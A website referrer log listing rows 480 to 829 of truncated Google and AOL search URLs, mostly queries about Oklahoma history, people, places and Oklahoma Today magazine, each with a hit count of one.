480http://www.google.com/search?q=The+Red+Bud+Gospel+singers+photographies&btnG=...1
481http://www.google.com/search?q=Loaded+tank+car+unearthed+at+Texas+port&hl=en&...1
482http://www.google.com/search?q=MLCKEY&hl=en&start=10&sa=N1
483http://aolsearch.aol.com/aol/search?lookupType=11&sourceType=402&text=&q=&inv...1
484http://www.google.com/search?q=Manford+Carselowey&hl=en&pwst=1&start=10&sa=N1
485http://www.google.com/search?q=March+20,+2001+Quartz+Mountain+Nature+Center&h...1
486http://aolsearch.aol.com/aol/search?lookupType=11&sourceType=402&text=&q=&inv...1
487http://www.google.com/search?q=John+L.+McCaslin+Enid+Ok&hl=en&rls=com.microso...1
488http://www.google.com/search?q=Kel+Jeffries+horse+training&hl=en&rls=com.micr...1
489http://www.google.com/search?q=John+Roose+Cherokee+Chief&btnG=Search&hl=en&cl...1
490http://www.google.com/search?q=Jacques+Hans+Gallrein&hl=en&client=safari&rls=...1
491http://www.google.com/search?q=National+Chouteau+Trail&hl=en&safe=strict&star...1
492http://www.google.com/search?q=Native+American+Artist+Phleat+Boyd&hl=en&rls=c...1
493http://www.google.com/search?q=Muskogee+1962+Oklahoma+State+Graduates&hl=en&r...1
494http://www.google.com/search?q=Upper+Illinois+River+Fishing+Report+Tahlequah,...1
495http://www.google.com/search?q=Marcus+Freiberger&num=20&hl=en&safe=off&client...1
496http://www.google.com/search?q=Medicine+Park,+OK+Easter+Pageant&hl=en&start=1...1
497http://www.google.com/search?q=Mike+Palmer+magazine+articles+Oklahoma&gbv=2&h...1
498http://www.google.com/search?q=Micki+Van+Deventer&rls=com.microsoft:en-us:IE-...1
499http://www.google.com/search?q=Nicola+D%27Ascenzo+oil+paintings&hl=en&start=2...1
500http://www.google.com/search?q=HOUSE+BILL+2248+oklahoma+covey+firearm&btnG=Se...1
501http://www.google.com/search?q=HOW+TO+SEW+A+CHOCTAW+DRESS+++++++++++++++++PAT...1
502http://www.google.com/search?q=Grand+Lake+O%27+The+Cherokees,+Pensacola+Dm&hl...1
503http://www.google.com/search?q=Hagen+Bros.+Circus+1957&hl=en1
504http://www.google.com/search?q=Herbert+Galey+and+gas+station+and+Tahlequah+Ok...1
505http://www.google.com/search?q=Frankoma+Plainsman+Planter+blue+%2317&hl=en&sa...1
506http://www.google.com/search?q=Gene+Briggs+%2B+Artist&hl=en&start=10&sa=N1
507http://www.google.com/search?q=Fusselman+Canyon+Petroglyph+Site&hl=en&rls=RNW...1
508http://www.google.com/search?q=JULY+27,1956&hl=en&safe=active&start=50&sa=N1
509http://www.google.com/search?q=Indian+Pioneer+Papers,+Vol+49,+Sep+21,1937,+Un...1
510http://www.google.com/search?q=Upper+Illinois+River+Fishing+Report+Tahlequah,...1
511http://www.google.com/search?q=Hunting+Horse+Kiowa+Painting+70&hl=en&rls=com....1
512http://www.google.com/search?q=Is+the+economy+in+Oklahoma+strong+or+weak%3F&i...1
513http://www.google.com/search?q=Homer+Pettigrew&hl=en&safe=active&rls=com.micr...1
514http://www.google.com/search?q=Homer+Pettigrew&hl=en&start=20&sa=N1
515http://www.google.com/search?q=How+to+stop+bakers+clay+from+cracking+after+it...1
516http://www.google.com/search?q=House+Brothers+Bluegrass+Band,+hugo+Oklahoma&h...1
517http://www.google.com/search?q=Ford+Motor+TOP+Salesman+in+Illinois+in+1972&hl...1
518http://www.google.com/search?q=Pryor+oklahoma+%22cement+Plant%22+history&hl=e...1
519http://aolsearch.aol.com/aol/search?invocationType=topsearchbox.search&query=...1
520http://www.google.com/search?q=Promotional+Posters+of+Black+Capped+Vireo&hl=e...1
521http://www.google.com/search?q=Roy+Lee+Duckett+and+Oklahoma&hl=en&start=40&sa...1
522http://www.google.com/search?q=S.R+LND.+SERLES+1900+GUNS&rls=com.microsoft:en...1
523http://aolsearch.aol.com/aol/search?invocationType=topsearchbox.search&query=...1
524http://www.google.com/search?q=Phil+Ball+Head+coach+Central+State+of+Edmond+O...1
525http://www.google.com/search?q=Pittsburgh+Plate+Glass+Company+works+10+in+Hen...1
526http://www.google.com/search?q=Phleat+Boyd&hl=en&start=10&sa=N1
527http://www.google.com/search?q=PAUL+DANKER+OF+IOWA&hl=en&start=230&sa=N1
528http://www.google.com/search?q=TWIN+CAVE+OKLAHOMA&hl=en&start=10&sa=N1
529http://www.google.com/search?q=Te+Ata+and+Indian+Ghost+Dance&hl=en&rls=com.mi...1
530http://www.google.com/search?q=T.+B.+Ferguson+Mansion+&sourceid=ie7&rls=com.m...1
531http://www.google.com/search?q=The+Population+of+Oklahoma+today&hl=en&start=0...1
532http://www.google.com/search?q=Seigniora+Laune&hl=en&ie=UTF-8&start=70&sa=N1
533http://www.google.com/search?q=Stephen+Mopope&hl=en&start=20&sa=N1
534http://www.google.com/search?q=Synar+brothers+Oklahoma&hl=en&start=60&sa=N1
535http://www.google.com/search?q=Summer+1963&rls=com.microsoft:*:IE-SearchBox&i...1
536http://www.google.com/search?q=OK+State+Girls+BB+tournament+on+channel+4+TV&h...1
537http://www.google.com/search?q=Oclahoma+Cty&rls=com.microsoft:en-us:IE-Search...1
538http://www.google.com/search?q=Oklahoma+BLAC+Inc++&hl=en&start=60&sa=N1
539http://www.google.com/search?q=OU+emblems&safe=on1
540http://www.google.com/search?q=Oklahoma+City,OK.++1975++The+Patio+historic+re...1
541http://www.google.com/search?q=Oklahoma+Disc+Jockey+History&hl=en&rls=com.mic...1
542http://www.google.com/search?q=OKLAHOMA+1977+BAND&hl=en&start=10&sa=N1
543http://www.google.com/search?q=OSU+vs.+OU+slogans&hl=en&safe=off&client=safar...1
544http://aolsearch.aol.com/aol/search?invocationType=topsearchbox.search&query=...1
545http://www.google.com/search?q=P.K.+Stear+/+Balanchine+ballerina&hl=en&start=...1
546http://www.google.com/search?q=Oklahoma+cimarron+county+dinosaur+quarries+&hl...1
547http://aolsearch.aol.com/aol/search?invocationType=topsearchbox.search&query=...1
548http://www.google.com/search?q=Oklahoma+bbw&hl=en&start=70&sa=N1
549http://www.google.com/search?q=Owner+of+Bad+little+buckers+miniature+bucking+...1
550http://www.google.com/search?q=Oklahoma+State+wrestler+%22Yoshiro+Fujita%22&h...1
551http://www.google.com/search?q=Oklahoma+Today&ie=utf-8&oe=utf-8&aq=t&rls=org....1
552http://www.google.com/search?q=Title+28%3A++Lands+and+Minerals%2Coklahoma%2Cs...1
553http://www.google.com/search?q=Oklahoma+baseball+1965&hl=en&rls=HPNN,HPNN:200...1
554http://www.google.com/search?q=+%22oil+painting%22+river+crossing+flooding+ro...1
555http://www.google.com/search?q=1971+president+nixon+tulsa+pictures+&sourceid=...1
556http://aolsearch.aol.com/aol/search?lookupType=11&sourceType=402&text=&q=&inv...1
557http://www.google.com/search?q=1968+drake+basketball+tapes&hl=en&start=30&sa=...1
558http://www.google.com/search?q=1974+will+rogers+high+school,+tulsa+ok&hl=en&s...1
559http://www.google.com/search?q=1975+university+of+oklahoma+wrestling&hl=en&st...1
560http://www.google.com/search?q=1957+blizzard&hl=en&client=firefox-a&channel=s...1
561http://www.google.com/search?q=1960+madill+alumni+banquet&hl=en&start=10&sa=N...1
562http://www.google.com/search?q=1963++ARMY+7+th+INF+DIV+PISTOL+TEAM+MEMBERS&hl...1
563http://www.google.com/search?q=1961+graduating+class+of+muskogee+central+high...1
564http://www.google.com/search?q=1930%27s+washing+machine+vs.+today&hl=en&start...1
565http://www.google.com/search?q=377th+Infantry+Regiment+in+World+War+II&hl=en&...1
566http://www.google.com/search?q=40+foot+hole+in+the+Wichita+Mountains&hl=en&st...1
567http://www.google.com/search?q=1980+pharmacist+(gray)+muskogee,ok&hl=en&start...1
568http://www.google.com/search?q=52+ft.+Houseboat+on+Lake+Eufalla&ie=utf-8&oe=u...1
569http://aolsearch.aol.com/aol/search?invocationType=topsearchbox.search&query=...1
570http://www.google.com/search?q=WATER+STRESS+WTER+MELON+PDF&btnG=%D8%A8%D8%AD%...1
571http://www.google.com/search?q=1980+mayor+of+altus,+oklahoma&hl=en&start=10&s...1
572http://www.google.com/search?q=1978-1979+Hockey+Night+in+Canada+USA+VS+Canada...1
573http://www.google.com/search?q=89ers+day+rodeo&rls=com.microsoft:en-us&ie=UTF...1
574http://www.google.com/search?q=+Owens+,+Vales+,+Hale,+indian+princess+blood+l...1
575http://www.google.com/search?q=+PIONEER+CLOTHING++FOR+PLAY+OKLAHOMA&rls=com.m...1
576http://www.google.com/search?q=Watonga%2C+OK-+guy+taking+pic+from+outside+kit...1
577http://www.google.com/search?q=+Zeb+Halsell&hl=en&lr=&rls=com.microsoft:en-us...1
578http://www.google.com/search?q=+ada+oklahoma+quilt+bee&rls=com.microsoft:*&ie...1
579http://www.google.com/search?q=What+o+do+if+you+got+bitten+by+a+rattle+snake+...1
580http://www.google.com/search?q=+Curses+of+Angus+Valley+Farms%2C+Sand+Springs%...1
581http://www.google.com/search?q=+%22red+white+and+bluegrass%22&hl=en&lr=&as_qd...1
582http://www.google.com/search?q=101+ranch+roy+clark&rls=com.microsoft:en-us:IE...1
583http://www.google.com/search?q=0kla.+cattlemen%27s+ass.+brands&hl=en&rlz=1T4D...1
584http://www.google.com/search?q=0klahoma+city+bus+stop&rls=com.microsoft:es-es...1
585http://www.google.com/search?q=+rental+man+lift+in+woodward+ok&hl=en&start=10...1
586http://www.google.com/search?q=100%25+free+how+to+fixe+electrical+system+for+...1
587http://www.google.com/search?q=+jenson+walls+oklahoma&btnG=Search&hl=en&safe=...1
588http://www.google.com/search?q=+june+1957+oklahoma+newspapers&hl=en&start=110...1
589http://www.google.com/search?q=+picters+of+camel++wearing+muzzels&hl=en&rls=c...1
590http://www.google.com/search?q=+mckee+oil+anadarko+oklahoma+&btnG=Search&hl=e...1
591http://www.google.com/search?q=FRED+OLDS+WESTERN+ART&hl=en&start=10&sa=N1
592http://aolsearch.aol.com/aol/search?invocationType=topsearchbox.search&query=...1
593http://www.google.com/search?q=Central+Glass+Co.+in+Spiro+Oklahoma+circa+&rls...1
594http://www.google.com/search?q=Cedar+Lake+Equestrian+Camp+Hodges%2C+Oklahoma&...1
595http://www.google.com/search?q=Cheyenne+wyoming+FRONTIER+1958+Friday,July+25t...1
596http://www.google.com/search?q=Clem+McSpadden&hl=en&client=safari&rls=en&star...1
597http://www.google.com/search?q=COSTUMES+WORN+IN+OKLAHOMA+MUSICAL&hl=en&rls=GG...1
598http://www.google.com/search?q=Can+you+have+Natural+underground+caves+in+your...1
599http://www.google.com/search?q=Cal+Suggs&hl=en&start=20&sa=N1
600http://www.google.com/search?q=CLUB++MlCKEY+++PLAY++++++.COM&sourceid=ie7&rls...1
601http://www.google.com/search?q=Debi+fAUBION&hl=en&safe=active&start=20&sa=N1
602http://www.google.com/search?q=Emogene+Blue+Eyes&hl=en&start=10&sa=N1
603http://www.google.com/search?q=Debi+Faubion&hl=en&rlz=1T4GGIH_enUS232US233&st...1
604http://www.google.com/search?q=Ernest+Childers+Photos&hl=en&start=120&sa=N1
605http://www.google.com/search?q=Costumes+for+%22Opal%27s+Million+Dollar+Duck%2...1
606http://www.google.com/search?q=Creamy+garlic+salad+dressing+recipe+Del+rancho...1
607http://aolsearch.aol.com/aol/search?lookupType=11&sourceType=402&text=&q=&inv...1
608http://www.google.com/search?q=DAVIS+P-32+MAGAZINE&hl=en&rlz=1T4ADBS_enUS257U...1
609http://www.google.com/search?q=A+truck+was+traveling+down+the+highway+at+arou...1
610http://www.google.com/search?q=Amor+Formal+in+Lawton,+Ok&hl=en&start=20&sa=N1
611http://www.google.com/search?q=Ann+Swank+in+oklahoma+city&hl=en&rlz=1T4DMUS_e...1
612http://www.google.com/search?q=Aerlex+fireworks&hl=en&client=firefox-a&rls=or...1
613http://www.google.com/search?q=Arrowheads+found+in+Norteastern+Oklahoma&hl=en...1
614http://www.google.com/search?q=Artist/+Charles+Banks+Wilson&hl=en&safe=strict...1
615http://www.google.com/search?q=ARTWORK+BY+++++GENE+HARTSELL+&rls=com.microsof...1
616http://www.google.com/search?q=Ada+Oklahoma+in+the+1940%27s&hl=en&start=70&sa...1
617http://www.google.com/search?q=Ada+Oklahoma+%22Cement+plant%22+history&hl=en&...1
618http://www.google.com/search?q=CHOCTAW+SPIRIT+TALES+BY+JACK+GREGORY+AND+RENNA...1
619http://www.google.com/search?q=C.+H.+McKennon%27s%2C+%22Iron+Men%2C%22+1967%2...1
620http://www.google.com/search?q=CANCER+IN+HOMINY+OKLAHOMA&hl=en&rlz=1T4RNWN_en...1
621http://www.google.com/search?q=Burchardt,+Bill&hl=en&start=20&sa=N1
622http://www.google.com/search?q=CHARTER+BUS+VACATIONS+LEAVING+FROM+OKC+OK&rls=...1
623http://www.google.com/search?q=Artunoff&hl=en&start=30&sa=N1
624http://www.google.com/search?q=Azalea+festival+wildflower+bicycle+ride+muskog...1
625http://www.google.com/search?q=Brenda+Kennday+Grummer,Artist&hl=en&rls=SUNA,S...1
626http://www.google.com/search?q=Bob+Hammack&hl=en&start=10&sa=N1
627http://aolsearch.aol.com/aol/search?invocationType=topsearchbox.search&query=...1
628http://www.google.com/search?hl=en&q=saddle+barn+pro+bll+rope1
629http://www.google.com/search?hl=en&q=scott+wigton+and+tulsa&btnG=Google+Searc...1
630http://aolsearch.aol.com/aol/search?query=lucille+mullhall+roping+steer+pictu...1
631http://www.google.com/search?hl=en&q=self+rock+hunting+tulsa+ok1
632http://aolsearch.aol.com/aol/search?query=hunt+cabinets&page=4&nt=SG4&encquer...1
633http://www.google.com/search?hl=en&q=riversbend+resort%2C+Oklahoma&btnG=Searc...1
634http://www.google.com/search?hl=en&q=riverside+indian+school+oklahoma+stone+t...1
635http://www.google.com/search?hl=en&q=robert+s+kerr+contribution+to+oklahoma+d...1
636http://www.google.com/search?hl=en&q=robbie+l+langston%2Cbonanza+arkansas1
637http://www.google.com/search?hl=en&q=risner+f-86+pushes+f-86+painting1
638http://www.google.com/search?hl=en&q=spiro+mound+And+haunting&btnG=Search1
639http://www.google.com/search?hl=en&q=spiro+mounds+ruins++&btnG=Google+Search1
640http://www.google.com/search?hl=en&q=sopai+definition+from+spanish+to+english...1
641http://www.google.com/search?hl=en&q=stargazing+places+in+oklahoma&btnG=Searc...1
642http://www.google.com/search?hl=en&q=shortcakes+diner1
643http://www.google.com/search?hl=en&q=small+town+diners+in+Oklahoma1
644http://www.google.com/search?hl=en&q=soldier+shot+at+fort+hood+texas+1976-197...1
645http://www.google.com/search?hl=en&q=snake+hide+hill+osage+county+oklahoma1
646http://www.google.com/search?hl=en&q=state+coptol&btnG=Google+Search1
647http://www.google.com/search?hl=en&q=professional+boxers+from+quapaw+oklahoma...1
648http://www.google.com/search?hl=en&q=putnam+city+rolling+woods+calendar+oklah...1
649http://www.google.com/search?hl=en&q=preparing+chinaberry+seed+for+beading&bt...1
650http://www.google.com/search?hl=en&q=quartz+mountan&btnG=Google+Search1
651http://www.google.com/search?hl=en&q=randelette+oklahoma1
652http://www.google.com/search?hl=en&q=pecan+cracking+enid%2C+oklahoma&btnG=Goo...1
653http://www.google.com/search?hl=en&q=photos+of+burns+flat+oklahoma+in+19781
654http://www.google.com/search?hl=en&q=poke+the+seventeenth+what+is+being+resto...1
655http://www.google.com/search?hl=en&q=pictures+of+the+uss+oklahoma+today&btnG=...1
656http://www.google.com/search?hl=en&q=richard+h.+Mosier%2Fclaremore%2Cok1
657http://www.google.com/search?hl=en&q=reticulated+python+broken+rib+pics&btnG=...1
658http://www.google.com/search?hl=en&q=rex+dunn&btnG=Google+Search1
659http://www.google.com/search?hl=en&q=related:www.oklahomatoday.com/site/shop/...1
660http://www.google.com/search?hl=en&q=rex+dunn&gbv=2&ie=UTF-8&sa=N&tab=iw1
661http://www.google.com/search?hl=en&q=rattlesnake+den+davis+oklahoma&btnG=Goog...1
662http://www.google.com/search?hl=en&q=rattlesnake+hunters+in+ou1
663http://www.google.com/search?hl=en&q=related:www.diyphotography.net/tutorials...1
664http://www.google.com/search?hl=en&q=rattlesnake+round-up%2C+mangum%2Coklahom...1
665http://www.google.com/search?hl=en&q=pawhuska+superstition+tales1
666http://www.google.com/search?hl=en&q=warren+theatre-okla&btnG=Google+Search1
667http://www.google.com/search?hl=en&q=was+the+company+awarded+to+provide+secur...1
668http://www.google.com/search?hl=en&q=wanted+vintage+zebcos1
669http://www.google.com/search?hl=en&q=weatherford+tx+broiler+burger+drive+in&b...1
670http://aolsearch.aol.com/aol/search?query=haskell+oklahoma+furniture+auction&...1
671http://www.google.com/search?hl=en&q=vacation+spats+in+oklahoma&btnG=Google+S...1
672http://www.google.com/search?hl=en&q=value+chandler+o.+t.+bricks1
673http://www.google.com/search?hl=en&q=voting+age+oklahoma+19561
674http://www.google.com/search?hl=en&q=vigorous+shaker1
675http://www.google.com/search?hl=en&q=tulsa+%22nancy+myers%221
676http://www.google.com/search?hl=en&q=what+year+did+lowa+achieve+statehood1
677http://www.google.com/search?hl=en&q=when+did+kamps+grocery+store+in+okc+clos...1
678http://www.google.com/search?hl=en&q=what+was+the+price+of+groceries+in+1958&...1
679http://www.google.com/search?hl=en&q=white+rock+cafe+guthrie+OK1
680http://www.google.com/search?hl=en&q=wha+tyear+did+the+soldiers+move+the+Cher...1
681http://www.google.com/search?hl=en&q=what+happened+in+oklahoma+in+19681
682http://www.google.com/search?hl=en&q=what+sorts+of+businesses+is+oklahoma+wel...1
683http://www.google.com/search?hl=en&q=what+lies+beneath+the+state+capital+of+o...1
684http://www.google.com/search?hl=en&q=stillwater+oklahom+money+plasma1
685http://www.google.com/search?hl=en&q=tauno+o+ekonen+violins+price1
686http://www.google.com/search?hl=en&q=the+%27ole+house+%2B+tulsa+%2B+%22jesse+...1
687http://www.google.com/search?hl=en&q=tankawa+way+of+life&btnG=Google+Search1
688http://www.google.com/search?hl=en&q=the+flood+in+1983+hennessey%2Coklahoma&b...1
689http://www.google.com/search?hl=en&q=the+movie+rentals+that+came+out+today+in...1
690http://www.google.com/search?hl=en&q=straw+bale+contractors+in+Ok.+panhandle1
691http://www.google.com/search?hl=en&q=summer+highs+in+OK+5+years+ago1
692http://www.google.com/search?hl=en&q=suzanne+prueter&btnG=Google+Search1
693http://www.google.com/search?hl=en&q=summer+jump+rope+camps+in+oklahoma+and+t...1
694http://www.google.com/search?hl=en&q=tsa+la+gi+rite+of+passage+party1
695http://www.google.com/search?hl=en&q=touring+the+precious+moments+factory+okl...1
696http://www.google.com/search?hl=en&q=tracy+mccleary+-+royal+theater&btnG=Sear...1
697http://www.google.com/search?hl=en&q=tommy+quaid+oklahoma&btnG=Search1
698http://www.google.com/search?hl=en&q=truitt+oklahoma+legislature&btnG=Search1
699http://www.google.com/search?hl=en&q=thorpe+pawnee+bill+miller+ponca+city+nov...1
700http://www.google.com/search?hl=en&q=ticket+for+orlahoma&btnG=Google+Search1
701http://www.google.com/search?hl=en&q=tom+knifechief&btnG=Google+Search1
702http://www.google.com/search?hl=en&q=tim+mander+oklahoma&btnG=Google+Search1
703http://www.google.com/search?hl=en&q=who+got+the+2001+cy+curtis+record+buck+i...1
704http://www.google.com/search?hl=en&q=linn+pauahty&btnG=Google+Search1
705http://aolsearch.aol.com/aol/search?query=tuberculosis+sanitoriums+in+oklahom...1
706http://www.google.com/search?hl=en&q=lake+murray+chapel+oklahoma+wedding+&btn...1
707http://www.google.com/search?hl=en&q=little+sarah+sand+dunes+in+waynoka+oklah...1
708http://www.google.com/search?hl=en&q=lndlan+porn1
709http://www.google.com/search?hl=en&q=joel+everett+machinery+auction&btnG=Sear...1
710http://www.google.com/search?hl=en&q=karen+benka1
711http://www.google.com/search?hl=en&q=king+okla&btnG=Google+Search1
712http://www.google.com/search?hl=en&q=kerr+mcgee+swim+club+1970+team1
713http://www.google.com/search?hl=en&q=joan+wolfe++stilwell+oklahoma+&btnG=Goog...1
714http://www.google.com/search?hl=en&q=magnolia+mansion+idabel1
715http://www.google.com/search?hl=en&q=mammoth+bone+oklahoma+19011
716http://aolsearch.aol.com/aol/search?query=short+story+about+blacks+living+in+...1
717http://www.google.com/search?hl=en&q=mary+parker+dog+breeder+eufaula+oklahoma...1
718http://www.google.com/search?hl=en&q=longhorn+flame++frankoma+mug&btnG=Search...1
719http://www.google.com/search?hl=en&q=lopat+bible&btnG=Google+Search1
720http://www.google.com/search?hl=en&q=lowell+dunham%2C+oklahoma1
721http://www.google.com/search?hl=en&q=loren+hollander1
722http://www.google.com/search?hl=en&q=mlaml+++++Dolphins&btnG=Google+Search1
723http://www.google.com/search?hl=en&q=how+to+play+lets+go+by+dave+linche+in+gu...1
724http://www.google.com/search?hl=en&q=hydro+nuclear+power+plant+lake+waurika&b...1
725http://www.google.com/search?hl=en&q=how+early+can+i+bet+at+remington+park+ok...1
726http://www.google.com/search?hl=en&q=indian+edible+wild+weed+eastern+oklahoma...1
727http://www.google.com/search?hl=en&q=ingalls+gunfight&btnG=Google+Search1
728http://aolsearcht7.search.aol.com/aol/search?invocationType=topsearchbox.sear...1
729http://www.google.com/search?hl=en&q=horses+for+sale+no+farther+than+hennesy+...1
730http://www.google.com/search?hl=en&q=how+do+you+know+that+Marguerite+has+a+go...1
731http://www.google.com/search?hl=en&q=hosters+for+para+carry9&btnG=Google+Sear...1
732http://www.google.com/search?hl=en&q=jimmy+Halsey++Beaver+OK%2C&btnG=Search1
733http://www.google.com/search?hl=en&q=jacques+hans+gallrein&btnG=Search1
734http://www.google.com/search?hl=en&q=james+flunke+collection&btnG=Google+Sear...1
735http://www.google.com/search?hl=en&q=jack+riley+sculptor&btnG=Google+Search1
736http://www.google.com/search?hl=en&q=jester+caves&btnG=Search1
737http://www.google.com/search?hl=en&q=iron+door+wichita+mountains1
738http://www.google.com/search?hl=en&q=j.+emmor+harston&btnG=Search1
739http://www.google.com/search?hl=en&q=jack+kilpatrick+romanza1
740http://www.google.com/search?hl=en&q=jack+halliburton+duncan&btnG=Search1
741http://www.google.com/search?hl=en&q=paul+gordon+early+retirement+from+oklaho...1
742http://www.google.com/search?hl=en&q=oklahoma+today&as_q=restaurant+guide1
743http://www.google.com/search?hl=en&q=oklahoma+today+40+under+401
744http://www.google.com/search?hl=en&q=oklahoma+today1
745http://www.google.com/search?hl=en&q=oklahoma+treasures+devils+canyon%2Cok1
746http://www.google.com/search?hl=en&q=old+diners+in+oklahoma1
747http://www.google.com/search?hl=en&q=oklahoma+potters1
748http://www.google.com/search?hl=en&q=oklahoma+state+golf+19631
749http://www.google.com/search?hl=en&q=oklahoma+state+university+tech+-+okmulge...1
750http://www.google.com/search?hl=en&q=oklahoma+state+in+19681
751http://www.google.com/search?hl=en&q=oklahoma+oilfield+paintings+&btnG=Search...1
752http://www.google.com/search?hl=en&q=ou+vs.+nebraska+19761
753http://www.google.com/search?hl=en&q=pagent+to+observe+easter++or+good+friday...1
754http://www.google.com/search?hl=en&q=oscar+glover+oklahoma&btnG=Search1
755http://www.google.com/search?hl=en&q=patrick+jacobs+wooden+soldiers&btnG=Sear...1
756http://www.google.com/search?hl=en&q=old+scca+road+course+at+lake+ponca1
757http://www.google.com/search?hl=en&q=oldfield+rattlesnake+springs+trail+of+te...1
758http://www.google.com/search?hl=en&q=osage+patterns1
759http://www.google.com/search?hl=en&q=on+march+28+what+will+the+temperature+of...1
760http://www.google.com/search?hl=en&q=mystic+cave%2C+sulphur%2C+ok1
761http://www.google.com/search?hl=en&q=nw+classen+lady+knights+in+oklahoma+pict...1
762http://aolsearch.aol.com/aol/search?query=raymond+red+corn&page=3&nt=null&tex...1
763http://www.google.com/search?hl=en&q=no+name+ranch+in+oklahoma1
764http://www.google.com/search?hl=en&q=oil+gusher+in+granite+oklahoma&btnG=Sear...1
765http://www.google.com/search?hl=en&q=okiebug+spinnerbaits1
766http://www.google.com/search?hl=en&q=national+geographic+henryetta+rodeo+vide...1
767http://www.google.com/search?hl=en&q=niagara+1957-58+basketball&btnG=Search1
768http://www.google.com/search?hl=en&q=no+name+ranch+%26+oklahoma1
769http://www.google.com/search?hl=en&q=night+lnvaslon&btnG=Google+Search1
770http://www.google.com/search?hl=en&q=oklahoma+mag+online1
771http://www.google.com/search?hl=en&q=oklahoma+fountainhead+cabins+hot+tub1
772http://www.google.com/search?hl=en&q=oklahoma+home+studies+lynn+sageser&btnG=...1
773http://www.google.com/search?hl=en&q=oklahoma+diners&btnG=Search1
774http://www.google.com/search?hl=en&q=oklahoma+lawyers+for+children+lynn+sages...1
775http://www.google.com/search?hl=en&q=oklahoma+city+1969+trash+strike&btnG=Sea...1
776http://www.google.com/search?hl=en&q=oklahoma+city+capitol+grounds+unusual+me...1
777http://aolsearch.aol.com/aol/search?query=pictures+of+oscar+bach+lamps+from+t...1
778http://www.google.com/search?hl=en&q=oklahoma+city+lakeshore+mall+in+1980&btn...1
779http://www.google.com/search?hl=en&sa=X&oi=spell&resnum=0&ct=result&cd=1&q=mi...1
780http://www.google.com/search?hl=en&rlz=1T4GFRG_enUS214US214&sa=X&oi=spell&res...1
781http://www.google.com/search?hl=en&rlz=1T4GGIE_enUS243US243&q=eufaula+oklahom...1
782http://www.google.com/search?hl=en&rlz=1T4GFRD_enUS217US219&q=norman+B.+Wilts...1
783http://www.google.com/search?hl=en&rlz=1T4GGIH_enUS240US240&q=%22clay+lewis%2...1
784http://aolsearch.aol.com/aol/search?query=angora+chaps&page=3&nt=null&encquer...1
785http://www.google.com/search?hl=en&rlz=1T4DMUS_enUS238&q=wynnewood+oklahoma+h...1
786http://www.google.com/search?hl=en&rlz=1T4DMUS_enUS244US260&q=charley+wright+...1
787http://www.google.com/search?hl=en&rlz=1T4GFRC_enUS214US214&sa=X&oi=spell&res...1
788http://www.google.com/search?hl=en&rlz=1T4DMUS_enUS265US265&sa=X&oi=spell&res...1
789http://www.google.com/search?hl=en&rlz=1T4DMUS_enUS221US221&q=broomcorn+harve...1
790http://aolsearch.aol.com/aol/search?query=angora+chaps&page=3&nt=SG3&encquery...1
791http://www.google.com/search?hl=en&rlz=1T4GGLR_enUS217US217&q=Hiem+cutting+ho...1
792http://www.google.com/search?hl=en&rlz=1T4GGLJ_enUS234US234&q=kiamichi+mounta...1
793http://www.google.com/search?hl=en&rlz=1T4GGLR_enUS226US226&q=bonanza+mine+ch...1
794http://www.google.com/search?hl=en&rlz=1T4GGIH_enUS263US264&as_qdr=all&q=Butt...1
795http://www.google.com/search?hl=en&rlz=1T4GGIH_enUS266&q=Ward+S.+Merrick+Oil+...1
796http://www.google.com/search?hl=en&rlz=1T4GGLJ_en-GBUS242US242&q=nu+draper+ok...1
797http://www.google.com/search?hl=en&rlz=1T4GGLF_enUS244US244&sa=X&oi=spell&res...1
798http://www.google.com/search?hl=en&rlz=1T4GGLR_enUS248US262&q=%22Bill+Burch%2...1
799http://www.google.com/search?hl=en&rlz=1T4ADBS_enUS262&q=oklahoma+booming&btn...1
800http://www.google.com/search?hl=en&rlz=1T4ADBS_enUS264US264&sa=X&oi=spell&res...1
801http://www.google.com/search?hl=en&rlz=1T4ADBS_enUS258US259&q=pawnee+signs+an...1
802http://www.google.com/search?hl=en&rlz=1T4ADBS_en___US206&q=enid+high+school+...1
803http://www.google.com/search?hl=en&rlz=1T4ADBS_en___US216&q=Wilson+Creek+myst...1
804http://www.google.com/search?hl=en&rlz=1T4ADBR_enUS259US260&q=pashubbe+creek+...1
805http://www.google.com/search?hl=en&rlz=1T4ADBR_enUS261US261&sa=X&oi=spell&res...1
806http://www.google.com/search?hl=en&rlz=1T4ADBS_enUS258US258&sa=X&oi=spell&res...1
807http://www.google.com/search?hl=en&rlz=1T4ADBS_enUS224US229&sa=X&oi=spell&res...1
808http://www.google.com/search?hl=en&rlz=1T4DKUS_en___US207&sa=X&oi=spell&resnu...1
809http://aolsearch.aol.com/aol/search?query=angora+chaps&page=4&nt=SG4&encquery...1
810http://www.google.com/search?hl=en&rlz=1T4DKUS_enUS264&q=Bioscope+Manufacturi...1
811http://www.google.com/search?hl=en&rlz=1T4DKUS_enUS229US230&q=%22robert+lee+o...1
812http://www.google.com/search?hl=en&rlz=1T4DKUS_enUS266US266&q=pontotoc+county...1
813http://aolsearch.aol.com/aol/search?query=artist+or+photographer+of+western+a...1
814http://www.google.com/search?hl=en&rlz=1T4DKUS_enUS209US209&q=life+in+urban+o...1
815http://www.google.com/search?hl=en&rlz=1T4DKUS_enUS225US225&pwst=1&sa=X&oi=sp...1
816http://www.google.com/search?hl=en&rlz=1T4DKUS_enUS210US210&q=edmond+oklahoma...1
817http://www.google.com/search?hl=en&rlz=1T4ADBR_enUS257US258&sa=X&oi=spell&res...1
818http://www.google.com/search?hl=en&sa=X&oi=spell&resnum=0&ct=result&cd=1&q=Ok...1
819http://www.google.com/search?hl=en&sa=X&oi=spell&resnum=0&ct=result&cd=1&q=Ok...1
820http://www.google.com/search?hl=en&sa=X&oi=spell&resnum=0&ct=result&cd=1&q=Mu...1
821http://aolsearch.aol.com/aol/search?query=Simpler+Times+Inn+blueberry+french+...1
822http://www.google.com/search?hl=en&sa=X&oi=spell&resnum=0&ct=result&cd=1&q=Pe...1
823http://www.google.com/search?hl=en&sa=X&oi=spell&resnum=0&ct=result&cd=1&q=HE...1
824http://www.google.com/search?hl=en&sa=X&oi=spell&resnum=0&ct=result&cd=1&q=Ji...1
825http://www.google.com/search?hl=en&sa=X&oi=spell&resnum=0&ct=result&cd=1&q=Le...1
826http://www.google.com/search?hl=en&sa=X&oi=spell&resnum=0&ct=result&cd=1&q=Ka...1
827http://www.google.com/search?hl=en&sa=X&oi=spell&resnum=0&ct=result&cd=1&q=Gr...1
828http://www.google.com/search?hl=en&sa=X&oi=spell&resnum=0&ct=result&cd=1&q=co...1
829http://www.google.com/search?hl=en&sa=X&oi=spell&resnum=0&ct=result&cd=1&q=ho...1
